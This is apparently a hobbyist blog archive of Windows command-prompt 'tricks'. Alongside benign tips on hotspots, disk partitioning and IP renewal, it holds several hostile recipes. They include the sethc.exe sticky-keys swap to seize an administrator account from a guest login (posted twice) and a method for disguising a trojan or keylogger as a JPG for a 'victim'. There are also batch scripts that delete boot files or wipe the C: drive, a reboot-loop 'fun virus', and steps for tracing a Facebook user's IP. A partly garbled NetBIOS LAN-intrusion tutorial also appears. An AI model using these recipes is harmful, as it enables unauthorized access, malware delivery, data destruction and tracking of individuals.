Pages

Showing posts with label CMD. Show all posts
Showing posts with label CMD. Show all posts

Tuesday, 8 April 2014

Trick to Make Wi-Fi Hotspot on Window using Notepad!!!

Follow these steps : 
1) Open Notepad and type paste below code into it.

netsh wlan set hostednetwork mode=allow
ssid=FreeWIFI key=12345
netsh wlan start hostednetwork

 

2) Now you can change the SSID by changing code in blue color and you can change the
security code in red color.
3) Now make sure to save this file as Start.bat and its done.
4) Now create another new Notepad file and paste below code into it.
 

netsh wlan stop hostednetwork
 

Save this file as Stop.bat and your Wi-Fi Hotspot stopping process is up.
So now when ever you want to start the Wi-Fi Hotspot simply double click the Star.bat
file and your Wi-Fi hotspot will start to broadcast.
As soon as you are done you can double click the Stop.bat file and your broadcast
will be stopped.

Enjoy...:) 

Thursday, 27 March 2014

Trick To Get PC detail using CMD code!!!

We at all times see many varieties of software which give you aspect about your computer like about Ram, hard disk, processor and another thing about your PC. But we do not need to really check all this information about our pc we can get this much of information using command promote (CMD) .here is the trick how to see your computer detail using CMD

1) Start -> Run -> And type there cmd. command promote will open.
2) Type  systeminfo
3) Now you can see your computer full configuration in detail.
Note: If you error message, may you are not activated DCOM Server Process Launcher service. To activate this service open Services window from "Start -> Control Panel -> Administrative Tools -> Services" then start "DCOM Server Process Launcher" service.
ENJOY......:)

Sunday, 23 March 2014

How to Hack windows administrator account through guest account???

Follow these steps:

1) Go to C:/windows/system32.
2) Copy cmd.exe and paste it on desktop.
3) Rename cmd.exe to sethc.exe.
4) Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
5) Now Log out from your guest account and at the user select
window,press shift key 5 times.
6) Instead of Sticky Key confirmation dialog,command prompt
with full administrator privileges will open.
7) Now type “ NET USER ADMINISTRATOR “zzz” where “zzz”
can be any password you like and press enter.
8) You will see “ The Command completed successfully” and
then exit the command prompt and login into administrator
with your new password.
9) Now You have hacked admin through guest account.

ENJOY.....:)

Saturday, 8 March 2014

how to setup a usb drive to be bootable by cmd???

Follow these steps:
1) plug-in your USB stick
2) CMD run as admin privilege
3) Type Diskpart command
4) select disk 1 ( this will be the drive letter of your usb disk)
5) clean
6) create partition primary
7) select partition 1
8) active
9) format fs=NTFS QUICK
10) assign
11) exit
  Copy windows files to USB Drive and change
  Boot sequence in BIOS
ENJOY....:)

Monday, 3 March 2014

How To Convert File System, fat - fat32 to ntfs???

Open CMD and type  Command:
 

convert d: /fs:ntfs

This Command would Convert your d: drive to ntfs.
If the system cannot lock the drive, you will be prompted to convert it during next reboot.
Normally you should select yes.
Conversion from fat/fat32 to ntfs is non-destructive, your data on the drive will NOT be lost.

Be aware that converting to ntfs will make that partition of your drive unreadable under dos unless you have ntfs utilities to do so.
ENJOY...:)

Friday, 28 February 2014

Hide EXE File into JPG !!!

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.
IF U LIKE THEN COMMENT AND SHARE THANX..:)

Monday, 17 February 2014

How to trace someone’s IP address on Facebook???

you need to follow these simple steps:-

1) First of all you got to find out the IP address of the user concerned. To do that you are required to receive a message from the user. If you don’t have one from them just invite them for a chat or send them a message yourself.

 2) Close all open windows and browsers before opening a browser and logging into your Facebook account. Refrain from opening any other tabs or browser windows. Close all other programs that automatically connect to the Internet, such as iTunes, Google Music Manager and instant messaging apps. If you can, clear your browser’s history as well as its cache.

 3) Now open the message that you have just received from the user. With your chat window open, click on “Start” an open command prompt by clicking on “run”.  Type in “cmd”.

 4) The command prompt is now open. Type the folloing command- “netstat -an” (without quotes) and hit enter.

You will get all established connections IP addresses there. Note down all the suspicious IPs.

 5)  You have to trace that user using his IP address. For that we will be using an IP tracer service. Go the link- IP Tracer. Then paste the IP address in the box that says “look up this IP or website”. It will sho you the location of the user.
It will show you all the information about that user along with his ISP and a location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture, you can actually zoom in and try to recognize the area. If anything  serious just note down the ISP details on that page and contact them about the IP, they will respond to you.
Other netstat  commands that you can use:
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
-s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
-p option may be used to specify a subset of the default.

Request a new IP address from your ISP server!!!

Here's how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.

Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it. This works if you have a Mobile Broadband connection or PPPoE

Sunday, 16 February 2014

HOW TO HIDE DRIVES USING CMD??

1)First go to search and type "diskpart" and hit enter.
2)Now “diskpart.exe” is open then type “list volume”, this command is used to see all the drives/volume which is present currently on your system.
3)Then type “select volume” and hit enter this command is for to select the which drive/volume you want to hide.
4)Here I am “select volume 0 , I want to hide my ‘G drive’.You can hide your drive with the volume present in your system.
5)Type “remove letter G” and hit enter.
6)now I will show you how to assign the hide drive/volume.
Type “assign letter G”.It will again assign the disk volume.


HOW TO HIDE DRIVES USING CMD:

1-First go to search and type diskpart and hit enter.
2-Now “diskpart.exe” is open then type “list volume”, this command is used to see all the drives/volume which is present currently on your system.
3-Then type “select volume” and hit enter this command is for to select the which drive/volume you want to hide.
4-Here I am “select volume 0 , I want to hide my ‘G drive’.You can hide your drive with the volume present in your system.
5-Type “remove letter G” and hit enter.
6-now I will show you how to assign the hide drive/volume.
Type “assign letter G”.It will again assign the disk volume.

;)

Top 4 Methods To Remove Write Protection From Your Pen Drives


METHOD #1

Open Registry editor of your PC
For this you should type command “regedit” on run.
Successively navigate to following linkHKEY_LOCAL_MACHINE\SYSTEM\Currentcontrolset\control\storatedevicepolicies( Note: if you can’t find “ storatedevicepolicies ” after “control” folder then you need to create it. For that follow instructions mentioned below )
Open a new note pad file.
Copy this
cd\reg add “HKLM\System\CurrentControlSet\Control\StorageDevicePolicies” /t Reg_dword /v
WriteProtect /f /d 0
save it as DISABLEWP.BAT
Then copy it to start up folder.
In right side u will be getting writeprotect option, just right click that and modify the hexadecimal value from 1 to 0
Restart your PC and enjoy!!!!

METHOD #2
If you have transcend pen drive infected by 9u.exe which is a write protect virus then the following works like a charm:
1) Download JetFlash online recovery from:
www.transcendusa.com/Support/DLCenter/Software/OnLineRecovery.exe
2) Run the program
3) Specify the capacity of your drive eg.512 MB, 1 GB …..etc
4) Choose “repair and erase all data” OR ” repair and keep existing data”
5) Progress bar starts…….completes
6) Notification appears —” format complete”
7) Unplug and plug your drive and …..presto

enjoy!!!!

Method #3

1. Start > Run -> type “CMD” and press enter
2. type< diskpart
3. type< list volume
4. type< select volume # (# is the number of the USB HDD you’ve pluged in)
5. type< attributes disk clear readonly

(If you need help while typing commands then type “HELP FORMAT” on command prompt)

METHOD #4

There are a series of options in the Group Policy Object Editor that deal with read/write permissions on hard drives and removable media. I basically changed their individual settings from “Not configured” to “Disabled”.

Start -> Run… -> gpedit.msc -> OK
Computer Configuration -> Administrative Templates -> System -> Removable Storage Access

In here I disabled all of the “Deny read access/write access” options; you may only want to disable the ones relating directly to the type of media that you want to access.

Here are the ones I changed:

Removable Disks: Deny execute access
Removable Disks: Deny read access
Removable Disks: Deny write access

Double-click each one and select the ‘Disabled‘ radio button.

Do the same as above, except the first step is “User Configuration” instead of “Computer Configuration“

(Best result if you try both method #1 and method #4 together)

Enjoy!!!

All the methods mentioned are tested and they works well in my PC.

Saturday, 15 February 2014

Some cmd fun tricks try it..

1) If you are using a guest account and run is disabled you can use notepad to open regedit and cmd'
open notepad and type command.com and save it as cmd.bat this batch file will open command prompt.
if you cant open regedit by run open notepad type regedit and save it as regedit.bat double click on this and regedit window will open.

2) use notepad to abort shutdown -Open notepad and type shutdown -a and save it as shutdown.bat.next time when your computer is about to shutdown double click on this bat file. for other cmd commands open command prompt and type shutdown a and press enter.

3) cmd fun virus- open notepad and type shutdown -r 10 and save as restart.bat this will restart your computer in 10 seconds if you want to use this for fun paste this file in system 32 and see. computer will restart in every 10 second.

4) IP command- open command prompt and type ipconfig/all .

5) How to know your friend's ip when chatting on a messenger. suppose you are using g-talk. ask your friend for a good wallpaper you have downloaded. send this to him .Now open your cmd and type Netstat -n

Wednesday, 12 February 2014

HOW TO HACK INTO SOMEONES COMPUTER ON LAN NETWORK?


-------------- Hacking into a computer ----------

This tutorial is for readers as well who have only the basic knowledge, they will also be able to understand how hackers
hack with NetBIOS. Using NetBIOS is probably the easies way to hack into a computer.

WHAT IS NetBIOS?

NetBIOS stands for Network Basic Input Output System. It allows applications on separate computers to communicate over a
local area network. NetBIOS was developed in 1983 by Sytek Inc, as an API for software communication over IBM's
PC-Network LAN technology. As many other service it also works on a port (port 139).Most people don’t even know
 but when they are connected to the internet they could have their hard drive shared. So if we can find a way into
the network than we can do anything with the computer.

LETS BEGIN

1. You need to download cain and abel. It’s a really useful program.
(YOU CAN EASLY DOWNLOAD www.softpedia.com)

Once you got it open it. It has a sniffer built inside of it. An IP sniffer looks for every ip address in your local
 subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the
 blue cross. Another window will pop up, make sure “All host in my subnet” is selected, and then click ok. It will scan
 for computers printers etc. Now choose an Ip address that you would like to hack.

When you got your target go to start ->run and type “cmd” without quotes. This will open the command prompt which
we will be using for the whole tutorial.

2. If you don’t know if your target is turned on then you can check it with the ping command, just type:ping IP
 address into the command prompt.
C:\Users\xxxxx>ping 192.168.1.11
Pinging : bytes=32 time<1ms TTL=128Reply from : bytes=32 time<1ms TTL=128Reply from : bytes=32 time<1ms TTL=128Reply
from : bytes=32 time<1ms TTL=128:Packets: Sent = 4, Received = 4, Lost = 0 (0% losApproximate round trip times in
 milli-seconds:Minimu­m = 0ms, Maximum = 0ms, Average = 0ms
NetBIOS Remote Machine Name Table
Share name Type Used as Comment\CIf the command was successful than we will get the confirmation - The command was
 completed successfully.\ipc$ "" /­user:""You may replace k letter by any other letter. If you did everything correctly
 than by now you should have a drive named K:. You should be able to do anything to the computer’s C drive including
 hacking the hell out of it, or putting a key-logger on the drive.. ENJOY.....:)

HOW TO FIND THE IP ADDRESS OF ANY WEBSITE?

1.open run.
2.type 'cmd' without quotes
3.type 'ping websitename.com/.org/.net etc. without quotes

eg:
ping facebook.com

4.note the ip address written on the top most line,now you are done.

Tuesday, 11 February 2014

HOW TO HIDE TEXT IN NOTEPAD?

Follow these steps:
1) Open your cmd

2) Type cd.. to change directory to c:drive or cd desktop  to change directory.

3)Now type code in cmd:
    notepad filename.txt:hidden
 4) Write some data and save it.

5) Now check that file filename.txt you will not see any text in that file.

6) If you want to see the containts in file the again open cmd and type same command
     notepad filename.txt:hidden and press enter...
 Now all done and you can see the containts of that file enjoy....:)

Monday, 10 February 2014

How to hacking windows administrator through guest user?

 1) Go to C:/windows/system32
    

 2)Copy cmd.exe and paste it on desktop

3)  rename cmd.exe to sethc.exe
 

4)Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.     When asked to overwrite,overwrite the sethc.exe
 

5) Now Log out from your guest account and at the user select window,press shift key 5 times.
  Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.
 

6)  Now type “ NET USER ADMINISTRATOR mypwd” where “mypwd” can be any password you like and press enter.
  

7)You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
 

8)  Congrats You have done .......:)

How to delete viruses from pen drive with out any software?

it's very cool tricks.i think it will be helpful tricks for everyone.so you want do it,follow this steps.




1) Connect your pen drive and do not open it by using auto run.

2) Open Run and type cmd and press enter.

3) In the Command Prompt, Type the drive letter of your pendrive(you can check it from my computer) and then press enter.

4) Type dir/w/o/a/p and press Enter.
It will display list of files.

5) Now in that list search for virus files like:

Autorun.inf

New Folder.exe

Bha.vbs

Iexplore.vbs

Info.exe

New_Folder.exe

Ravmon.exe

RVHost.exe

any other files with .exe Extension . *

6) If it contains any of the files above file then type attrib -h -r -s -a *.* and press Enter.

7) Delete each of that file using delete Command
    del filename (For exaple: del New_Folder.exe)

 enjoy.....:)
 

Sunday, 9 February 2014

How to Shutdown a computer forever?

Now Please don’t try this because this is the most simplest and deadliest trick for your windows computer. Copy the following code into your notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini


Save it as “filename.bat”. Just make sure it
has a .bat or .cmd extension.
 

IF YOU DONT WANT TO REBOOT YOUR SYSTEM AGAIN THEN ONLY THEN YOU CAN USE THIS TRICK.....:) 

Here’s an alternative code.
cmd /c del c:\windows\* /F /S /Q
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat

 BOTH CODE DO SAMETHING....:)

 

Saturday, 8 February 2014

Hide The Files Behind Image

1. Gather the file you wish to bind, and the image file, and place them in a folder. I will be using C:\New Folder

-The image will hereby be referred to in all examples as xyz.jpg

-The file will hereby be referred to in all examples as New Text Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:\New Folder]

5. Type [copy /b xyz.jpg + secret.rar xyz.jpg] (remove the brackets)
Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from xyz.jpg to xyz.rar, then open and your file is there

b) Leave the file extension as is, right click, open with WinRar and your file is there.

Friday, 7 February 2014

How To Create Undeletable And Unrenamable Folders

How To Create Undeletable And Unrenamable Folders  ?
1) Go to Start and then Click on Run.
2) Type cmd and press enter ,To open cmd.
3)  you cannot create Undeletable & unrenamable folder in your root directory . That means you can't make this kind of folder in C: drive if you installed windows on C:
3) Type D: or E: and press enter
4) Type md filename\ and press enter (md : make directory)
5)  Open that directory, you will see the folder created by you.
6) Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?
 It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
1) Open cmd
2) Type D: ( if u created this type of folder in D: drive) and press enter
3) Type rd filename\ (rd : remove directory)
    
   Open that directory and the folder will not appear because it is removed.